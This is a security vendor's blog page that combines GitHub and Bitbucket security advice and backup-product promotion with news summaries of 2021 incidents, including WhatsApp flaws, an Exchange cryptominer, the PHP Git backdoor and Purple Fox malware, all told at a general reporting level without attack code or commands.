Skip to content

GitHub security – key basic security measures you should consider

GitHub, Bitbucket or GitLab? What to choose? For some businesses, especially those for which code as intellectual property is the most valuable asset, the security of code hosting and version control service aspect might be a decision-maker. In this article, we take a closer look at GitHub security.

GitHub security – breaches and failures

Since applications fuel our digital world and every company generates, processes, and stores data – every business is now a technology company. At the same time, code and enterprise applications create a prime target for malicious actors – resulting in devastating data breaches.

So how is it with GitHub security? Well, it’s considered a reliable and proven development tool, but as with any service, some events of failures or outages occur to GitHub from time to time. Security breaches are always a big thing in the community, a thing that might leave you wondering whether your data is next in order to be compromised. Let’s look at a few of the more recent ones that happened to Git or GitHub on user or service-side.

In March of 2021 the official PHP Git repository was hacked and the code base tampered with due to the software supply chain attack. 

In June 2020, there was a major outage of the Github service that lasted for hours and impacted millions of developers.

In May of 2019, a series of ransomware attacks happened targeting Git repositories on GitHub, BitBucket, and GitLab. Owners of affected repositories were blackmailed to pay or their code would be released to the public. 

And ransom itself might not be the higher cost. Just imagine what hackers can do with your code and access to your intellectual property…

GitHub security measures

Now let’s take a closer look at how GitHub is trying to protect your intellectual property – below you can find some of the most important GitHub security tools and approaches. 

Empowering stronger authentication measures

Strong credentials are critical to prevent malicious access to your account. There are many common ways that hackers try to gain access to your account with phishing and social techniques on the top of the list.

A strong password is an excellent starting point – include a mix of small and big letters, special characters, abstract words. Remember to set up a strong, long, and unique password for each and every website you have an account on. The strength of the password isn’t good when it’s used on many websites, because in case of any account credential breach that password is already known and can be used in further attacks in the future.

Also, it seems challenging to remember each password on each website. That is why GitHub itself recommends using a password manager. 

You have probably heard about HaveIBeenPwned.com, a project originally invented by Troy Hunt which you can use to check for compromised passwords (if not – we recommend you to try it). Hunt made over 500 million record datasets available for download. And GitHub made use of it. Using this data it created its own, internal version of the service. It checks whether a user’s password has been found in any publicly reported and available sets of breach data. 

Two-Factor Authentication (2FA) 

The other good practice that is recommended is to set up a 2FA (Two-Factor authentication) for your account. 2FA requires you to not only enter the correct password to the account, but also to provide another means of authentication like SMS code, or in-app confirmation on your phone. That means that, even if your password has been compromised, the hacker won’t gain access to your account, because he would also need to have access to your second layer of authentication. But make sure not to lose access to your second factor, because it can dramatically increase the difficulty of recovering access to your account in case of disaster.  

GitHub bug bounty

GitHub security department has launched a community project to find breaches within its systems and make sure it discovers bugs and vulnerabilities faster than threat actors. The premise of this project is to find as many vulnerabilities as possible and to do that GitHub employed the whole internet. When someone finds a vulnerability in GitHub, it can be submitted on the site, and depending on the scale of the problem found, the rewards may vary from $617 to even over $30,000. This way GitHub security can be greatly improved, mainly due to the actions of the community. 

Xopero’s way to ensure GitHub security

Whether you think GitHub security is sufficient or not, it’s a fact that when an attack strikes your intellectual property, your company would be in very big trouble. It doesn’t matter whether one of your developers accidentally deletes a branch, or a ransom attack targets your company, you need to be sure that your data is recoverable and accessible so your employees can get back to work, and there will be no risk of business interruption. Having a proper backup of your repositories will ensure that you can recover your data at any point in time and get back to code immediately. 

Protect your intellectual property with Xopero ONE Backup and Recovery for GitHub:

  • Predefined backup plans or advanced customization possibilities
  • Backup servers, repositories and metadata – both local and cloud
  • Backup with every push or according to schedule – just set it and forget it
  • Keep data on-premise or in the cloud – AWS, Azure, etc. – choose your storage
  • Manage it all with the most user-friendly console and data-driven interface
  • Instant, stress-free recovery – get back to code immediately
  • Advanced retention schemes – FIFO or GFS – choose yours
  • Unlimited scalability – simply add new repositories

and many more…

About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Xopero
Xopero began in 2009, founded as a company serving primarily SMB users. Our goal was to create more accessible and affordable secure data protection solution for any businesses. In 2015, Xopero started cooperation with QNAP Inc. – one of the key global NAS providers. This addition expanded our portfolio to include a true backup appliance, In 2017, Xopero fully extended into global market thanks to cooperation with ESET. Our company took the place previously occupied by StorageCraft in the ESET Technological Alliance.

Beware! Two new WhatsApp bugs expose you to a man-in-the-middle attack

Android users have new reasons to worry… again. About a week ago, we provided information about the FlixOnline application which operators were able to successfully bypass the application authentication system in the Google Play Store. This time we report two serious bugs found in WhatsApp. They enable the so-called ‘man-in-the-disk’ attack. What is it exactly? Attackers are able to manipulate the data exchanged between the application and external memory. Details can be found below.

 

New WhatsApp bugs could’ve let attackers remotely hack your phone

Recently two security vulnerabilities have been spotted in WhatsApp for Android. They could have been exploited to execute malicious code remotely on the device and even exfiltrate sensitive information.

The flaws take aim at devices running Android versions up to Android 9 (including) by carrying out “man-in-the-disk” attack. It makes it possible for adversaries to compromise an app by manipulating certain data being exchanged between it and the external storage. 

The flaw (CVE-2021-24027) leverages Chrome’s support for content providers in Android (via the “content://” URL scheme) and a same-origin policy bypass in the browser (CVE-2020-6516), thereby allowing an attacker to send a specially-crafted HTML file to a victim over WhatsApp, which, when opened on the browser, executes the code contained in the HTML file.

All an attacker has to do is lure the victim into opening an HTML document attachment. Then WhatsApp will render this attachment in Chrome, over a content provider, and the attacker’s Javascript code will be able to steal the stored TLS session keys.

WhatsApp bugs – a mean to an end

Armed with the keys, a bad actor can then stage a man-in-the-middle attack to achieve remote code execution or even exfiltrate the Noise protocol key pairs.

Worse, the malicious code can be used to access any resource stored in the unprotected external storage area and expose sensitive information to any app that’s provisioned to read or write from the external storage.

WhatsApp users are recommended to update to version 2.21.4.18 to mitigate the risk associated with the flaws.

Source

Hijacked Microsoft Exchange used to host cryptominer

Cryptojacking can be added to the list of threats that face any unpatched Exchange servers that remain vulnerable to the ProxyLogon exploit. More than 92 percent of affected MS Exchange servers were patched- but the damage had already been done.

Researchers at Sophos report an unknown attacker is attempting to use a compromised Microsoft Exchange Server to deliver a malicious Monero cryptominer onto other vulnerable Microsoft Exchange Servers. Because the cryptominer is hosted on a compromised Exchange Server, it may be easier for the attacker to deliver the payload to other vulnerable targets as firewalls are less likely to block traffic between Exchange Servers.

The executables file associated with this attack as Mal/Inject-GV and XMR-Stak Miner (PUA).

The ‘unusual attack’

The attack begins with a PowerShell command to retrieve a file named win_r.zip from another compromised server’s Outlook Web Access logon path (/owa/auth). The .zip file is not a compressed archive at all but a batch script that then invokes the built-into-Windows certutil.exe program to download two additional files, win_s.zip and win_d.zip, which also are not compressed.

The batch script then runs another command that outputs the decoded executable into the same directory. Once decoded, the batch script runs the executable, which extracts the miner and configuration data from the QuickCPU.dat file, injects it into a system process, and then deletes any evidence that it was there.

Source

SMASH, the newest Rowhammer attack is a threat to your DDR4 memory card

Rowhammer is an umbrella term that refers to a class of exploits that leverage a hardware design quirk in DDR4 systems. SMASH is its newest variant that triggers a malicious JavaScript condition on the latest DDR4 RAM cards despite mitigations implemented by manufacturers for about 5 years.

RAM cards design

Memory RAM cards save data inside what’s called memory cells (each consisting of a capacitor and a transistor) that are arranged in the form of a matrix. But the memory cells tend to lose their state over time and therefore require a periodic reading and rewriting of each cell in order to restore the charge on the capacitor to its original level.

To hell with old mitigations…

To bypass TRR mitigations, SMASH carefully schedules cache hits and failures to activate the multifaceted Rowhammer bit. Then SMASH allows threat actors an arbitrary read/write primitive in the browser:

The exploit chain is initiated when a victim visits a malicious website under the adversary’s control or a legitimate website that contains a malicious ad, taking advantage of the Rowhammer bit flips triggered from within the JavaScript sandbox to gain control over the victim’s browser.

Source

SolarMarker hackers flood the web with 100K sites offering malicious PDFs

Cybercriminals are resorting to search engine poisoning techniques to lure business professionals into seemingly legitimate Google sites that install a Remote Access Trojan (RAT) capable of carrying out a wide range of attacks.

The attack starts by leveraging searches for business forms such as invoices, templates, questionnaires, and receipts as a stepping stone toward infiltrating their systems. Once the user attempts to download the alleged document template is redirected, without knowledge, to a malicious website that hosts the RAT.

According to eSentire researchers, once the RAT gets activated on the victim’s computer, attackers can send commands and upload additional malware, like ransomware, a credential stealer, a banking trojan, or simply use the RAT called SolarMarker (aka Yellow Cockatoo, Jupyter, and Polazert).as a foothold into the victim’s network.

The firm said it discovered over 100,000 unique web pages that contain popular business terms or keywords such as template, invoice, questionnaire, resume, and receipt. What is even more troubling aspect of this campaign is that SolarMarker group uses SEO techniques to populate many of their malicious pages and allow them to be ranked higher on the search results what increase the likelihood of success. 

If you are looking for any financial documents templates, better use only official, well-known websites.

Source

About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Xopero
Xopero began in 2009, founded as a company serving primarily SMB users. Our goal was to create more accessible and affordable secure data protection solution for any businesses. In 2015, Xopero started cooperation with QNAP Inc. – one of the key global NAS providers. This addition expanded our portfolio to include a true backup appliance, In 2017, Xopero fully extended into global market thanks to cooperation with ESET. Our company took the place previously occupied by StorageCraft in the ESET Technological Alliance.

FlixOnline – if you too have this app installed, delete it now

 

FlixOnline – this fake Netflix app is hijacking your WhatsApp sessions and stealing credit card data

FlixOnline app lured users by promising free Netflix Premium subscriptions. However, users instead of two months lasting freedom got mobile malware which was hijacking WhatsApp sessions to spread itself. 

The Check Point Research team revealed that the malware can capture WhatsApp notifications and take several predefined actions, such as Dismiss or Reply through the Notification Manager.

 

Image credit: Checkpoint

After FlixOnline gets installed on a device, it asks for overlay permissions, which is a common trick to steal service credentials. It also asks for Battery Optimization Ignore, which prevents a device from auto shut off software to save power. Additionally, the app asks for notification permissions to access WhatsApp-related communications.

Attackers next step? Stealing Netflix credentials and payment data such as credit card number. The information is then transmitted to a Command and Control server. 

The real problem: safe and sound… and undetected 

The app was available in Google Play Store for about  2 months and was downloaded nearly 500 times. Which is not a bad statistic. There were launched more successful and deadly campaigns within the last 12 months for sure. However, the real problem lies elsewhere. It is a fact that the malware was able to bypass Google Play Store’s app authentication system. In this case, Google Play Store’s built-in protection measures failed entirely.

Source

Looking for a job? Watch out for well-targeted job offers on Linkedin – it’s a malware!

A new spear-phishing campaign is targeting professionals on LinkedIn with weaponized job offers in an attempt to infect targets with a sophisticated backdoor trojan called “more_eggs.”

To increase the odds of success and open rate, the malicious ZIP archive files have the same name as victims’ job titles taken from their LinkedIn profiles. For example if Linkedin’s member position is Account Manager, the malicious zip file would be titled Account Manager position (note the ‘position’ added to the end). Upon opening the fake job offer, the victim unwittingly initiates the stealthy installation of the fileless backdoor, more_eggs. Once loaded, the sophisticated backdoor can download additional malicious plugins and provide hands-on access to the victim’s computer – said cybersecurity firm eSentire’s Threat Response Unit in analysis. Furthermore, it can act as a conduit to retrieve additional payloads from an attacker-controlled server, such as banking trojans, ransomware, credential stealers, and even use the backdoor as a foothold in the victim’s network so as to exfiltrate data.

The Trojan also abuses legitimate Windows processes such as WMI to evade detection by traditional AV tools.

Campaigns delivering more_eggs using the same modus operandi have been spotted at least since 2018, with the backdoor attributed to a malware-as-a-service (MaaS) provider called Golden Chickens. The adversaries behind this new wave of attacks remain unknown, although more_eggs has been put to use by various cybercrime groups such as FIN6, Cobalt, and EvilNum in the past.

The group is thought to be taking advantage of the high number of COVID-19 redundancies to spread this email campaign. 

Sources: 1 | 2

Discord and Slack full of malware – just one network search turned up 20,000 virus results!

Abuse of collaboration applications is not a new phenomenon. Recent changes to employee workflows caused by the COVID-19 pandemic have led to an increased reliance upon communications platforms like Discord and Slack for conducting business. As predicted now they have been infiltrated by threat actors, who are abusing their legitimate functions to evade security and deliver info-stealers, remote-access trojans (RATs) and other malware.

Various RATs and stealers, including Agent Tesla, AsyncRAT, Formbook and others.

Why did cybercriminals move to collaboration applications?

One of the key challenges associated with malware delivery is making sure that the files, domains or systems don’t get taken down or blocked. Moving to collaborations apps attackers greatly have increased the likelihood that the malicious attachment reaches the end-user. Slack, Discord and other collaboration app platforms use content delivery networks (CDNs) to store the files shared back and forth within channels. Let’s use Slack as an example. Files can be uploaded to Slack, and users can create external links that allow the files to be accessed, regardless of whether the recipient even has Slack installed. And once it has evaded detection by security, it’s just a matter of getting the employee to think it’s genuine business communication, a task made easier within the confines of a collaboration app channel.

This also means attackers can deliver their malicious payload to the CDN over encrypted HTTPS, and that the files will be compressed, further disguising the content. Over the past year Tallos Intelligence Team – which conducted extensive research – observed many common compression algorithms being used, including .ACE, .GZ, .TAR and .ZIP, and several less common types, like .LZH.

CDNs are also handy tools for cybercriminals to deliver additional bugs with multi-stage infection tactics. The researchers saw this behaviour across malware, adding that one Discord CDN search turned up almost 20,000 results in VirusTotal. This technique was frequently used in campaigns associated with RATs, stealers and other types of malware typically used to retrieve sensitive information from infected systems.

Attackers turned the Discord API into an effective tool to exfiltrate data from the network. The C2 communications are enabled through webhooks, which were developed to send automated messages to a specific Discord server.

How to mitigate the risk?

Most organizations use a large number of communication tools. The most frequently used are email, collaboration and messaging platforms, web conferencing chats, and text messages on phones and tablets. In some cases, users communicate with different or sometimes the same people across multiple platforms. It is tiring and leads to lesser awareness of possible risk factors and vector attacks. 

What do specialists recommend? Mark Kedgley, CTO at New Net Technologies proposes to focus on the least privileges, as it’s still too common for users to run with local admin rights. Many business solutions provide hardened settings to combat malware and phishing. But not enough organizations make use of them. That is why we should also put in place security controls – change control and vulnerability management.

Source

EtterSilent maldoc builder mimics DocuSign and is used by top cybercriminal gangs

Hackers are using a malicious document builder named ‘EtterSilent’ to run their criminal schemes. As its popularity on underground forums increased, the developer kept improving it to avoid detection from security solutions.

Ads promoting EtterSilent maldoc builder have been published on underground forums, boasting features like bypassing Windows Defender, Windows AMSI (Antimalware Scan Interface), and popular email services, Gmail included. 

It comes in two versions, according to the Intel 471 research. One exploits a vulnerability in Microsoft Office, CVE-2017-8570, and one uses a malicious macro. 

One version of EtterSilent imitates the digital signature product DocuSign or DigiCert, though when targets click through to electronically sign documents, they are prompted to enable macros. This allows the attackers to target victims with malware.

Because it uses Excel 4.0 XML macros, EtterSilent does not depend on the Visual Basic for Applications (VBA) programming language, which is commonly seen with malicious macros.

Last month EtterSilent was used in a campaign that leveraged another tool, called Bazar loader. In a previous campaign that used EtterSilent, attackers dropped an updated version of Trickbot, a banking trojan. Others, using banking trojans BokBot, Gozi ISFB and QBot have also used EtterSilent, Intel 471 notes.

Sources: 12

About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Xopero
Xopero began in 2009, founded as a company serving primarily SMB users. Our goal was to create more accessible and affordable secure data protection solution for any businesses. In 2015, Xopero started cooperation with QNAP Inc. – one of the key global NAS providers. This addition expanded our portfolio to include a true backup appliance, In 2017, Xopero fully extended into global market thanks to cooperation with ESET. Our company took the place previously occupied by StorageCraft in the ESET Technological Alliance.

Monthly summary: Git Backup Guide / GitProtect beta tests

The first week of April is already behind us. It’s the final time to make some summary of our activities and special projects we have prepared for you last month.

Check it out!

GIT Backup GUIDE: How to protect GitHub, Bitbucket, and GitLab

Code as Intellectual Property could be the most valuable asset within your business – you need to be sure it’s properly protected. As CTO, IT manager, software-house owner, or team leader – you probably can imagine how much it would cost you to lose the code your team has been working on for months…

How to protect your GitHub, Bitbucket, or GitLab repositories, servers, and metadata? Do you need a third-party backup solution? Is it even possible that an outage or any event of failure would ever happen to companies like GitHub or Atlassian? What should the Git backup strategy include? All the answers as well as recommendations for solutions empowering your security and productivity in GitHub and Bitbucket you will find in our brand new guide – “GIT Backup Guide: How to protect GitHub, Bitbucket and GitLab data”. 

Free download

GitProtect – GitHub and Bitbucket Backup – Join BETA TESTS

Join Beta Tests of GitProtect – #1 professional, manageable backup solution for GitHub, and Bitbucket. If your organization uses version control systems, you probably are aware that code as intellectual property is the most valuable asset inside your company – you and your team spent thousands of hours (and money) to write, support and improve projects. Make sure it’s recoverable and accessible. Join beta tests now and get access to extended trial, exclusive offers, special discounts, and much more. 

Try out our key features – very soon:

  • Backup GitHub and Bitbucket servers, repositories and metadata – local & cloud
  • Set it and forget it – backup code with every push or according to schedule
  • New repo? It will be automatically added to your backup plan (predefined or customized)
  • Keep data on-premise or in the cloud – choose your storage
  • Restore anywhere you need – to a repository or local device – 
  • Stay up to date with backup verification, advanced reporting, notifications, audit logs 
  • The #1 most user-friendly console and data-driven interface on the market.

Code peacefully – we’ve got your back(up).

Join Beta Tests

Xopero cited in major IT media

Last month insights and results of our survey on cybersecurity have been widely commented on in the most popular tech magazines and media again. We have been invited to local magazines, radio and podcasts.

Many issues in the area of security are treated marginally or even downplayed. A perfect example is employee training, which usually applies only to IT departments. This is a serious mistake. After all, today almost everyone uses a computer to work, not always knowing what threats may face. I believe that the lack of proper training reflects directly into the most common vector of ransomware infection, which is email phishing. Phishing, in turn, is nothing more than malicious email messages, in which criminals often impersonate a known entity or act on our emotions and induce us to take specific actions – download an attachment or click malicious links – comments Grzegorz Bąk, our Product Development Manager exclusively for Brief – a leading polish business and technology portal. 

We are very delighted that cybersecurity is becoming a more relevant subject of social discussions, and Xopero can contribute to shaping public opinion and educating businesses about data protection. 

About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Xopero
Xopero began in 2009, founded as a company serving primarily SMB users. Our goal was to create more accessible and affordable secure data protection solution for any businesses. In 2015, Xopero started cooperation with QNAP Inc. – one of the key global NAS providers. This addition expanded our portfolio to include a true backup appliance, In 2017, Xopero fully extended into global market thanks to cooperation with ESET. Our company took the place previously occupied by StorageCraft in the ESET Technological Alliance.

Bugs in VMware vRealize Operations platform make RCE and admin’s credentials theft possible

Welcome to the next episode of the Xopero Security Center. Stealing admin credentials or gaining access to the platform capable of managing IT operations in various cloud deployments, allowing admins to monitor the health and capacity of virtual environments is a serious security breach. And these black scenarios become more than possible thanks to two newly discovered [and patched] vulnerabilities in VMware vRealize Operations platform. How severe is this new threat? To uncover this true check the whole post below.

 

VMware with two severe vulnerabilities in vRealize Operations platform – they could lead to RCE and stealing admin’s credential

VMware has published security updates to address high severity vulnerabilities which impact vRealize Operations, VMware Cloud Foundation, and vRealize Suite Lifecycle Manager. Unpatched, they could allow attackers to steal admin credentials after exploiting vulnerable servers.

The first vulnerability – tracked as CVE-2021-21975 – was found in the vRealize Operations Manager API. This is a server-side request forgery (SSRF) bug with a CVSS score of 8.6 out of 10. It permits threat actors with network access to perform SSRF attacks and steal administrator credentials.

The second bug, tracked as CVE-2021-21983 and scored 7.2 CVSS – was also discovered in the vRealize Operations Manager API. This bug does require an attacker to be authenticated and have network access to exploit (and first vulnerability could allow just that). But when these conditions are met the bug permits attackers to write files to arbitrary locations on the underlying photon operating system.

What is at stake?

– Pre-auth remote code execution and thief of admin credentials. Attackers can exploit the vulnerability remotely without requiring authentications or user interaction in low complexity attacks to steal administrative credentials. Patches are already available but VMware has also published workaround instructions for admins who don’t want to or can’t immediately patch vulnerable servers – there is a possibility that there is no patch for their version. Detailed information on how to do that is available on the vendor’s Knowledge Base.

Source

PHP’s Git server hacked to add backdoors to source code and obtain RCE

The official PHP Git server has been compromised in a potential attempt to implant malware in the PHP project’s code base. Two malicious commits were pushed to the php-src Git repository maintained by the PHP team on their git.php.net server.

These commits were signed off as if they were made by known PHP developers and maintainers, Rasmus Lerdorf and Nikita Popov and masked as simple typographical errors that needed to be resolved.

However, in the added line 370 where zend_eval_string function is called, the code actually plants a backdoor for obtaining easy Remote Code Execution (RCE) on a website running this hijacked version of PHP.

Popov said the development team is not sure exactly how the attack took place. The clues indicate that the official git.php.net server was likely compromised, rather than individual Git accounts.

Additionally, the malicious commit was made in the name of PHP creator, Rasmus Lerdorf. That is hardly surprising as with source code version control systems like Git, it is possible to sign-off a commit as coming from anybody else locally and then upload the spoofed commit to the remote Git server, where it gives off the impression as if it had indeed been signed-off by the person named on it.

Luckily, the commits were detected and reverted before they made it downstream or impacted users. However, the incident is alarming considering PHP remains the server-side programming language to power over 79% of the websites on the Internet.

An investigation into the security incident is now underway. The development team has also decided to move permanently to GitHub.

Sources: 12

Two new Linux vulnerabilities could let attackers extract sensitive information from kernel memory

Two new vulnerabilities – tracked as CVE-2020-27170 and CVE-2020-27171 –  impact all Linux kernels prior to 5.11.8. If successfully exploited, could let attackers circumvent mitigations for speculative attacks such as Spectre and obtain sensitive information from kernel memory.

While CVE-2020-27170 can be abused to reveal content from any location within the kernel memory, CVE-2020-27171 can be used to retrieve data from a 4GB range of kernel memory.

The new vulnerabilities uncovered by Piotr Krysiuk of Symantec’s Threat Hunter team aim to get around these Spectre/Meltdown mitigations in Linux by taking advantage of the kernel’s support for extended Berkeley Packet Filters (eBPF) to extract the contents of the kernel memory. Specifically, the kernel (“kernel/bpf/verifier.c”) was found to perform undesirable out-of-bounds speculation on pointer arithmetic, thus defeating fixes for Spectre and opening the door for side-channel attacks.

Unprivileged users could leverage these weaknesses to gain access to secrets from other users sharing the same vulnerable machine. If attackers gain access to an exploitable machine such as downloading malware onto the machine to achieve remote access this could also allow them to gain access to all user profiles on the machine.

Official patches are available from March 20th. Ubuntu, Debian, and Red Hat deployed fixes in their respective Linux distributions as well.

Source

Docker Hub images downloaded 20M times spread cryptominers

At least 30 malicious publicly available images in Docker Hub, with a collective 20 million downloads, have been used to spread cryptomining malware. It is estimated that this trick brought authors around $200,000. 

Docker Hub is the largest library of container applications, allowing companies to share images internally or with their customers, or the developer community to distribute open-source projects.

Aviv Sasson, the researcher with Palo Alto Networks’ Unit 42  found that they came from 10 different accounts. Some of them have names that clearly indicate their purpose, while others have misleading names like “proxy” or “ggcloud” or “docker.” Some of them are still available on Docker Hub at the moment of writing. 

In 90,3% of cases, the attackers’ operation mined for Monero cryptocurrency, XMRig being the favorite tool for the purpose. However, some operations sought Grin (GRIN) or ARO (Aronium) cryptocurrency.

Sasson found that the adversaries behind the malicious images have applied tags to them, which are a way to reference different versions of the same image. He theorized that the tags are used to match up the appropriate version of the malware depending on the various processor architectures or operating systems on which are downloaded. A common element for all the tags in an image is the wallet address or the mining pool credentials…

It’s very possible that those images are merely the tip of the iceberg, given that the cloud presents big opportunities for cryptojacking attacks.

Sources: 1 | 2

About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Xopero
Xopero began in 2009, founded as a company serving primarily SMB users. Our goal was to create more accessible and affordable secure data protection solution for any businesses. In 2015, Xopero started cooperation with QNAP Inc. – one of the key global NAS providers. This addition expanded our portfolio to include a true backup appliance, In 2017, Xopero fully extended into global market thanks to cooperation with ESET. Our company took the place previously occupied by StorageCraft in the ESET Technological Alliance.

Bitbucket security – best practices

For some businesses, especially those for which code is the most critical resource, the security of the code hosting and version control service might be a key decision factor. There are three main such services on the market – GitHub, Bitbucket, GitLab. In this article, we will take a closer look at Bitbucket security.

 

Bitbucket security – failures and breaches

Nowadays, applications and software fuel the digital world. Every company either generates, stores, processes data – nearly every business is a technology company now. And with that in mind, with every culminating bit of information, more and more businesses, software, or code becomes a perfect target for malicious attacks, which can result in devastating data breaches.

So what are the means that Bitbucket puts into securing business data? Bitbucket as a service is a part of an enterprise called Atlassian, and they as a company are quite transparent when it comes to their systems and interaction with a customer/user of their service, that includes, of course, security issues. 

Overall their security is considered reliable, but as with any internet service, some outages, or events of failures occur to Git itself or Bitbucket. Even if not to the entire company – a specific company Bitbucket account might be attacked and compromised. Still can’t believe it? Let’s mention just a few situations. 

In March of 2021 the official PHP Git repository was hacked and the code base tampered with due to the software supply chain attack. 

In May of 2019 IT services reported that attackers were targeting Bitbucket, GitHub and GitLab users, wiping code and commits from multiple repositories and leaving behind only a mysterious ransom note and a lot of questions.

It’s worth mentioning that ransom itself is just a small part of the entire ransomware damage cost. What are other ingredients? Cost of damaged/stolen data, downtime costs, lost productivity, post-attack disruption to the normal course of business, forensic investigation, employee training, loss of reputation and direct response to the ransomware attacks. 

Just imagine what would happen if hackers have gained access to your intellectual property – your company’s code.

Bitbucket security measures

Let’s now take a look at how Atlassian and specifically – BitBucket – is trying to protect your repositories on their site. Below you will find some of the most important Bitbucket security measures.

Increasing login security

Creating strong login credentials for user accounts is critical in preventing malicious access to your account. Nevertheless, there are many ways hackers would try to gain access to your accounts, with social techniques and phishing on the top.

Having a strong password is a great starting point. A strong password should contain a mix of small and capital letters, special characters, numbers. But the 100% of the strength of the password doesn’t lay in its complexity, but rather in the unique use for each and every account you have. Let’s pretend you created the unbreakable password for one website and then used it on every other one. A security breach happens, and that password is now compromised, and hackers can gain access to every account you have that password set on. 

Single sign-on for Bitbucket security

The need to remember each and every password you create might seem challenging. That is why BitBucket suggests using a Single sign-on (SSO). This makes it possible to access network services as well as all resources associated with it, with the help of one set of login data. The user simply logs into his SSO portal, from which he easily obtains access to all applications without another authentication.

Can you rely on it? It depends. In this case, the strength of SSO equals our credential strength. Only in conjunction with the appropriate password administration policy, and even tokenization it is much more secure than logging in each time with weak passwords that are repetitive for various services. 

With a growing number of cloud services used in the workspace, an SSO allows users to have just-in-time provisioning, centralized management of authentication policies, and automatic lockout when a user is deactivated from an SSO provider. 

Bitbucket allows you to log in with a G Suite, or if you have a subscription to Atlassian Access, you can connect with any identity provider you see fit.

Two-step verification in Bitbucket

The other good practice is to force a two-step verification in addition to your password. It guarantees that your account stays secure even if your password is compromised. To enable this two-step verification in Bitbucket you need: 

  • An authentication app on your mobile device or desktop (such as Authy, Duo, Google Authenticator for Android/iOS, or Microsoft Authenticator for Windows mobile)
  • Confirmed email and password on you Atlassian Account 
  • An SSH key assigned to your account. 

Actually you can use any application which supports the Time-based One-time Password Algorithm (TOTP) method. You can also use security keys – hardware devices as your second step verification. 

To make it work you also need to enable two-step verification within your Bitbucket account (avatar -> Personal Settings -> Security -> Two-step verification). and confirm it with providing your password. 

Setting such a method requires the user not only to enter the correct password for his account but also to provide another step of verification.

Please keep in mind that if a user forgets the password and loses access to the second factor, it would be much more difficult to recover the access to his account.

Atlassian bug bounty enforcing Bitbucket security

Atlassian operates a public bug bounty program for their products via their partner, Bugcrowd. It helps its security team to find breaches within their systems, to make sure vulnerabilities and bugs are found first by the “good guys” before the hackers can find and use them with malicious intent. Security researchers can receive cash payments in exchange for a qualifying vulnerability report submitted to Atlassian. Depending on the scale of the bug the monetary rewards vary. The average payout for a problem found in the last 3 months (at the time or writing this article) is $568.

Xopero’s way to ensure Bitbucket security

It doesn’t matter if you think Bitbucket security is sufficient or not, it’s a fact that your business would be in very big trouble if an attack strikes your intellectual property. Accidental deletion of a branch, or a ransom attack targeted at your repositories, doesn’t matter, you need to make sure that your data is recoverable and accessible so your employees can get back to work as soon as possible, minimizing the risk of business interruption. Having a proper backup of your repositories can ensure that you will be able to recover your code at any point in time and get back to work immediately.

Protect your intellectual property with Xopero ONE Backup and Recovery for BitBucket:

  • Backup with every push or according to schedule – just set it and forget it
  • Instant, stress-free recovery – get back to code immediately
  • Predefined backup plans or advanced customization possibilities
  • Backup servers, repositories, and metadata – both local and cloud
  • Unlimited scalability – simply add new repositories
  • Keep data on-premise or in the cloud – Amazon, Azure, etc. – choose your storage
  • Manage it all with the most user-friendly console and data-driven interface
  • Advanced retention schemes – FIFO or GFS – choose yours

and many more…

About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Xopero
Xopero began in 2009, founded as a company serving primarily SMB users. Our goal was to create more accessible and affordable secure data protection solution for any businesses. In 2015, Xopero started cooperation with QNAP Inc. – one of the key global NAS providers. This addition expanded our portfolio to include a true backup appliance, In 2017, Xopero fully extended into global market thanks to cooperation with ESET. Our company took the place previously occupied by StorageCraft in the ESET Technological Alliance.

Purple Fox malware has gained new and alarming worm capabilities

Welcome to the next episode of the Xopero Security Center. This week we are taking a break from MS Exchange and ProxyLogon vulnerabilities. Maybe except this small update: according to Microsoft, 92% of vulnerable Exchange servers are now patched or mitigated. But Microsoft’s ecosystems are profitable targets and attackers take advantage of newer vulnerabilities to infect systems over and over again. Thus, this time we are taking a closer look into an upgraded variant of Purple Fox malware with worm capabilities that targets Microsoft Windows machines. Which one exactly? To find out more, read the full post.

Purple Fox malware with new worm capabilities targets exposed Windows systems

Purple Fox is malware previously distributed via exploit kits and phishing emails. Now it gained a worm module that allows it to scan for and infect Windows systems reachable over the Internet in ongoing attacks. The malware has been first spotted in 2018. But starting with May 2020, Purple Fox attacks have significantly intensified, reaching a total of 90,000 attacks and 600% more infections. Check yourself:
Image: Guardicore Labs
Infected systems exhibit worm-like behaviour
